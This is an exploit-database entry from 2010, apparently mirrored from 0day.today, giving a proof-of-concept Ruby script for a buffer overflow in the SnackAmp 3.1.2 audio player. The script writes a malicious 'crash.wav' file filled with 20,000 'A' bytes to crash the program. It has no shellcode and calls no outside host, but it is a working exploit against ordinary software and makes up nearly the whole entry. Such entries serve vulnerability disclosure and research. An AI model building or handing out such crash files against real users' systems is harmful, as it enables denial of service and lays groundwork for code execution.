id: 13907
date: 08/29/2010
title: SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)
author: James Fitts
cves: 

================================================================
SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)
================================================================

# Exploit Title: SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)
# Date: 08/28/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/snackamp/
# Version: 3.1.2
# Tested on: Windows XP SP3 EN
# CVE: N/A
 
#! /usr/bin/env ruby
 
junk = "\x41" * 20000
 
File.open("crash.wav", 'w') do |b|
    b.write junk
end



#  0day.today [2023-03-27]  #